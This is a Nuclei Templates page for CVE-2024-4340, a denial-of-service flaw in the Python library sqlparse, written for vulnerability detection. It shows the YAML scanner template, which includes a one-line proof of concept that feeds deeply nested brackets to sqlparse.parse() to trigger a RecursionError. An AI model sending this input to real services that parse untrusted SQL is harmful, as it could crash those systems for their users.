Skip to content
Nuclei Templates

sqlparse - Denial of Service

ID: CVE-2024-4340

Severity: high

Author: KoYejune0302,cheoljun99,sim4110,gy741

Tags: cve,cve2024,py,code,dos,python,sqlparse

Description

Section titled “Description”

Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.

YAML Source

Section titled “YAML Source”
id: CVE-2024-4340


info:
  name: sqlparse - Denial of Service
  author: KoYejune0302,cheoljun99,sim4110,gy741
  severity: high
  description: |
    Passing a heavily nested list to sqlparse.parse() leads to a Denial of Service due to RecursionError.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2024-4340
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4340
  tags: cve,cve2024,py,code,dos,python,sqlparse


self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      python -c "import sqlparse; sqlparse.parse('[' * 10000 + ']' * 10000)"


    matchers:
      - type: word
        part: stderr
        words:
          - "RecursionError: maximum recursion depth exceeded"
# digest: 490a0046304402201ac09f592d24f7e3d3087a1f7fbdb85b68416f74d0550fe9d9d9d41898a7b27b02206111d2729c3a07e5e63866a2ec73d167b64e612581728883cb8966797b137cf3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "code/cves/2024/CVE-2024-4340.yaml"

View on Github